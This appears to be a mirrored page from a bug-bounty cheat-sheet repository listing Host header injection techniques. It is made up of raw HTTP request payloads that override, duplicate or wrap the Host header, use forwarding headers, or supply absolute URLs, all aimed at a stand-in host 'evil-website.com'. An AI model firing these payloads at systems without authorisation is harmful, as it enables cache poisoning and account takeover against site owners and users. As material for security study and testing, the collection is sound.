mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 10:26:11 +00:00
905 B
905 B
Host Header Injection
- Change the host header
GET /index.php HTTP/1.1
Host: evil-website.com
...
- Duplicating the host header
GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com
...
- Add line wrapping
GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com
...
- Add host override headers
X-Forwarded-For : evil-website.com
X-Forwarded-Host : evil-website.com
X-Client-IP : evil-website.com
X-Remote-IP : evil-website.com
X-Remote-Addr : evil-website.com
X-Host : evil-website.com
How to use? In this case im using "X-Forwarded-For : evil.com"
GET /index.php HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For : evil-website.com
...
- Supply an absolute URL
GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com
...
Source: https://portswigger.net/web-security/host-header/exploiting